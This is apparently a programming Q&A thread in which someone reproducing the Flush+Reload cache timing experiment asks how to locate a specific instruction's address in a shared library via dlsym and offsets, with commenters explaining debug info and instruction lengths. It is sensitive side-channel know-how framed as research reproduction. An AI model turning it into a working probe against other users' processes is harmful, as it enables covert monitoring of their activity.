How to get the address of the instruction in the shared library?

Question

I want to reproduce some experiments in the flush-reload paper. In this experiment, there are two threads called A and B. There is a shared library c. The A thread flushes an instruction d in the shared library c from the cache through a flush instruction. Then A waits for a while. Then A reloads instruction d. If the loading time is short, it means that the instruction d is in the cache, indicating that the thread B used this instruction while the thread A was waiting. If it takes a long time to load instruction d, it means that instruction d is in the memory, indicating that thread B did not use this instruction during the waiting time of thread A.

I want to know how to get the address of an instruction in a shared library.

For example, I have a shared library with a function print. I want to get the address of the instruction a=a+1 in this function. by

gadget_module = dlopen("sym.so", RTLD_LAZY);
probe= (char**)(dlsym(gadget_module,"print"));

I can get the address of the print function, but how do I get the address of a=a+1? probe+n? (What should this n be?) How can it be verified that this address is indeed the instruction?

  int print(){
    a=a+1;
}

If your library comes with debug info then you can sift through that and find offset of particular line of code from the start of function. Then it is simple matter of adding start of function (that you already have handled) and line offset and that's it. — TCvD, Dec 03 '20 at 12:40
Thanks for your comment. How do I know the offset? And how do I verify that I am actually on that instruction? Is there a way to output the information of that instruction based on the address? — Gerrie, Dec 03 '20 at 12:43
As I said, you will have to parse (and understand) debug info. And of course, the library will have to include it (debug info is part of app or lib binary, it is in a special segment). To verify that it is indeed a valid instruction you must know what CPU you are on and then check if value at the location (function + offset) represents a valid CPU opcode. Also note, that usually it is not a 1:1 mapping between lines of C code and assembly. Usually there are several assembler instruction for each line of C code. — TCvD, Dec 03 '20 at 12:46
When I run with gdb, if the address of the print function is print+0, the address of another assembly instruction is print+4. Do I only need probe= (char**)(dlsym(gadget_module,"print")); probe+4 is the address of that instruction? Is there a way to verify the code? — Gerrie, Dec 03 '20 at 12:55
Depends on the CPU. With Intel instruction set this is difficult because you have instructions with very different lengths. On ARM and PowerPC instructions user to be 4 bytes long. To be really general you need to know CPU and its instruction set to be able to move to next instruction and to verify that you are looking at an actual instruction, not just some jiberish. — TCvD, Dec 03 '20 at 13:04

How to get the address of the instruction in the shared library?

0 Answers0